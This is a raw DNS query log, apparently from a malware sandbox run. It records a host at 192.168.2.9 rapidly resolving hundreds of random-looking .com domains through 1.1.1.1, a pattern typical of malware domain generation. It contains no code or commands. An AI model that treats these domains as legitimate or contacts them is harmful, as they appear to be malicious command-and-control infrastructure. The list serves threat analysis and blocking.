                                                                                                                                                                                                            Nov 11, 2024 18:08:11.451189041 CET192.168.2.91.1.1.10xe79aStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.451399088 CET192.168.2.91.1.1.10xe5fdStandard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.451751947 CET192.168.2.91.1.1.10x658dStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.451906919 CET192.168.2.91.1.1.10xc94bStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.453533888 CET192.168.2.91.1.1.10x3f7fStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.454073906 CET192.168.2.91.1.1.10x2de8Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.459013939 CET192.168.2.91.1.1.10xfb55Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.491117001 CET192.168.2.91.1.1.10x11cfStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.235975981 CET192.168.2.91.1.1.10x2b31Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.236969948 CET192.168.2.91.1.1.10x64b9Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.237370014 CET192.168.2.91.1.1.10x3dbaStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.243616104 CET192.168.2.91.1.1.10xbebStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.248506069 CET192.168.2.91.1.1.10xdf99Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.263241053 CET192.168.2.91.1.1.10x60d6Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.278089046 CET192.168.2.91.1.1.10x874bStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.319500923 CET192.168.2.91.1.1.10x3d42Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.320951939 CET192.168.2.91.1.1.10xc8b2Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.326169014 CET192.168.2.91.1.1.10x96dStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.340756893 CET192.168.2.91.1.1.10x525aStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.343118906 CET192.168.2.91.1.1.10x6921Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.344114065 CET192.168.2.91.1.1.10xd9cfStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.394608021 CET192.168.2.91.1.1.10x8b16Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.428361893 CET192.168.2.91.1.1.10x6385Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.429512978 CET192.168.2.91.1.1.10xe3c9Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.472176075 CET192.168.2.91.1.1.10x4680Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.472647905 CET192.168.2.91.1.1.10x703cStandard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.476109982 CET192.168.2.91.1.1.10x4b57Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.482676029 CET192.168.2.91.1.1.10x2215Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.487797022 CET192.168.2.91.1.1.10xbabdStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.487835884 CET192.168.2.91.1.1.10xf65fStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.494299889 CET192.168.2.91.1.1.10x338eStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.498620033 CET192.168.2.91.1.1.10x2f1cStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.499916077 CET192.168.2.91.1.1.10x6e80Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.500709057 CET192.168.2.91.1.1.10xb678Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.500730991 CET192.168.2.91.1.1.10x3ea6Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.501115084 CET192.168.2.91.1.1.10x55c3Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.501197100 CET192.168.2.91.1.1.10xaec9Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.539169073 CET192.168.2.91.1.1.10x263aStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.574618101 CET192.168.2.91.1.1.10xa4b5Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.835828066 CET192.168.2.91.1.1.10xad00Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.879941940 CET192.168.2.91.1.1.10x1dcfStandard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.215044022 CET192.168.2.91.1.1.10x397eStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.481245041 CET192.168.2.91.1.1.10xe507Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.481743097 CET192.168.2.91.1.1.10xec10Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.496695042 CET192.168.2.91.1.1.10xf73aStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504158020 CET192.168.2.91.1.1.10xc5f9Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504600048 CET192.168.2.91.1.1.10x5579Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504786015 CET192.168.2.91.1.1.10x2271Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.603379965 CET192.168.2.91.1.1.10xa11aStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.229906082 CET192.168.2.91.1.1.10xeccfStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.235205889 CET192.168.2.91.1.1.10x734eStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.235912085 CET192.168.2.91.1.1.10x1909Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.450068951 CET192.168.2.91.1.1.10x9d57Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.476017952 CET192.168.2.91.1.1.10x49e7Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.481046915 CET192.168.2.91.1.1.10x15ccStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.506999969 CET192.168.2.91.1.1.10x6041Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.561667919 CET192.168.2.91.1.1.10xd3dbStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.571018934 CET192.168.2.91.1.1.10x161Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.593882084 CET192.168.2.91.1.1.10x111dStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594113111 CET192.168.2.91.1.1.10x3144Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594513893 CET192.168.2.91.1.1.10xc31Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594747066 CET192.168.2.91.1.1.10xdfc0Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594928980 CET192.168.2.91.1.1.10xb675Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.598212004 CET192.168.2.91.1.1.10x6bd6Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600555897 CET192.168.2.91.1.1.10x3ed3Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.601407051 CET192.168.2.91.1.1.10xed10Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.602698088 CET192.168.2.91.1.1.10xd528Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607561111 CET192.168.2.91.1.1.10x7217Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607834101 CET192.168.2.91.1.1.10x9a35Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.609205961 CET192.168.2.91.1.1.10x9612Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616600990 CET192.168.2.91.1.1.10x9333Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616774082 CET192.168.2.91.1.1.10x8276Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627612114 CET192.168.2.91.1.1.10xebd9Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627851963 CET192.168.2.91.1.1.10x80b6Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.639084101 CET192.168.2.91.1.1.10xe647Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.643153906 CET192.168.2.91.1.1.10x828dStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.702573061 CET192.168.2.91.1.1.10x64f9Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.705095053 CET192.168.2.91.1.1.10x783Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.717345953 CET192.168.2.91.1.1.10x4e06Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.733721972 CET192.168.2.91.1.1.10x866dStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.095849037 CET192.168.2.91.1.1.10xfa4fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.241224051 CET192.168.2.91.1.1.10x2ec8Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.247834921 CET192.168.2.91.1.1.10xa65fStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.255080938 CET192.168.2.91.1.1.10xe0edStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.296621084 CET192.168.2.91.1.1.10xbafcStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.312520981 CET192.168.2.91.1.1.10x902eStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.314307928 CET192.168.2.91.1.1.10x7035Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.585989952 CET192.168.2.91.1.1.10xd72Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586405993 CET192.168.2.91.1.1.10x42c5Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586735964 CET192.168.2.91.1.1.10xeefbStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587270021 CET192.168.2.91.1.1.10xa0c7Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587696075 CET192.168.2.91.1.1.10xd660Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588246107 CET192.168.2.91.1.1.10x743bStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588615894 CET192.168.2.91.1.1.10xd235Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589270115 CET192.168.2.91.1.1.10x7b17Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589689016 CET192.168.2.91.1.1.10xf1edStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.590451956 CET192.168.2.91.1.1.10x9bc8Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591206074 CET192.168.2.91.1.1.10x5e01Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591520071 CET192.168.2.91.1.1.10x6b9dStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.592205048 CET192.168.2.91.1.1.10x8432Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.592720032 CET192.168.2.91.1.1.10xe38bStandard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.593354940 CET192.168.2.91.1.1.10x36c1Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.594048023 CET192.168.2.91.1.1.10xff36Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.594851971 CET192.168.2.91.1.1.10x170Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.596028090 CET192.168.2.91.1.1.10x60b8Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.596468925 CET192.168.2.91.1.1.10x4f6eStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.597269058 CET192.168.2.91.1.1.10x3761Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.597718000 CET192.168.2.91.1.1.10xe0f1Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.598216057 CET192.168.2.91.1.1.10x221fStandard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.598488092 CET192.168.2.91.1.1.10xf6f5Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.662081003 CET192.168.2.91.1.1.10xef3Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.662730932 CET192.168.2.91.1.1.10x6eb6Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.667296886 CET192.168.2.91.1.1.10xbc51Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.667690039 CET192.168.2.91.1.1.10x4f07Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.687767982 CET192.168.2.91.1.1.10x8397Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.688606977 CET192.168.2.91.1.1.10x742dStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.689116955 CET192.168.2.91.1.1.10xf36Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708091974 CET192.168.2.91.1.1.10x2115Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708120108 CET192.168.2.91.1.1.10x66ecStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708724976 CET192.168.2.91.1.1.10xfb45Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709018946 CET192.168.2.91.1.1.10x216aStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709084988 CET192.168.2.91.1.1.10xab6cStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709564924 CET192.168.2.91.1.1.10x213fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.714742899 CET192.168.2.91.1.1.10xcc1Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.714936972 CET192.168.2.91.1.1.10x99bbStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.715132952 CET192.168.2.91.1.1.10x331Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.722619057 CET192.168.2.91.1.1.10x92a4Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.249222040 CET192.168.2.91.1.1.10xde18Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657871008 CET192.168.2.91.1.1.10xb50aStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.658889055 CET192.168.2.91.1.1.10x7367Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.660176992 CET192.168.2.91.1.1.10x1c0fStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.702764988 CET192.168.2.91.1.1.10x8b06Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703350067 CET192.168.2.91.1.1.10xf949Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703572035 CET192.168.2.91.1.1.10x14acStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703754902 CET192.168.2.91.1.1.10xcbaaStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.709947109 CET192.168.2.91.1.1.10xda75Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.710558891 CET192.168.2.91.1.1.10x3bbaStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.710720062 CET192.168.2.91.1.1.10x28bStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.711330891 CET192.168.2.91.1.1.10xd569Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.711437941 CET192.168.2.91.1.1.10xfe96Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.712539911 CET192.168.2.91.1.1.10xc206Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.729547977 CET192.168.2.91.1.1.10x171aStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731234074 CET192.168.2.91.1.1.10x6a2fStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731630087 CET192.168.2.91.1.1.10x988cStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731982946 CET192.168.2.91.1.1.10x8832Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.732536077 CET192.168.2.91.1.1.10x91eeStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.732942104 CET192.168.2.91.1.1.10x7837Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733248949 CET192.168.2.91.1.1.10xded2Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733364105 CET192.168.2.91.1.1.10x7e50Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733688116 CET192.168.2.91.1.1.10x8564Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733845949 CET192.168.2.91.1.1.10xd71bStandard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.734039068 CET192.168.2.91.1.1.10xcd86Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.734245062 CET192.168.2.91.1.1.10x199fStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.005901098 CET192.168.2.91.1.1.10x1c52Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.039340019 CET192.168.2.91.1.1.10x6c89Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.046766043 CET192.168.2.91.1.1.10x9b14Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.048217058 CET192.168.2.91.1.1.10x425eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.050357103 CET192.168.2.91.1.1.10xe61Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.052325010 CET192.168.2.91.1.1.10x1883Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.055836916 CET192.168.2.91.1.1.10x1b9Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.056361914 CET192.168.2.91.1.1.10x618Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.169022083 CET192.168.2.91.1.1.10x3f0fStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.348836899 CET192.168.2.91.1.1.10x717cStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.591252089 CET192.168.2.91.1.1.10x9bf7Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.740487099 CET192.168.2.91.1.1.10x1582Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.900892973 CET192.168.2.91.1.1.10x731eStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.901340961 CET192.168.2.91.1.1.10x3b8bStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.901546001 CET192.168.2.91.1.1.10xa8aStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.903089046 CET192.168.2.91.1.1.10x8531Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.912940025 CET192.168.2.91.1.1.10xffbbStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.063950062 CET192.168.2.91.1.1.10x7952Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.064405918 CET192.168.2.91.1.1.10x4690Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.122569084 CET192.168.2.91.1.1.10xb36bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.132385969 CET192.168.2.91.1.1.10x2754Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.134188890 CET192.168.2.91.1.1.10x10e7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.136334896 CET192.168.2.91.1.1.10x96c6Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.137669086 CET192.168.2.91.1.1.10xf3b5Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.144802094 CET192.168.2.91.1.1.10x1bcdStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.155134916 CET192.168.2.91.1.1.10xa189Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.180301905 CET192.168.2.91.1.1.10x272aStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.183442116 CET192.168.2.91.1.1.10x1ebbStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.187263966 CET192.168.2.91.1.1.10x65dcStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.211525917 CET192.168.2.91.1.1.10x798cStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.248749018 CET192.168.2.91.1.1.10x3189Standard query (0)vonypom.comA (IP address)IN (0x0001)false
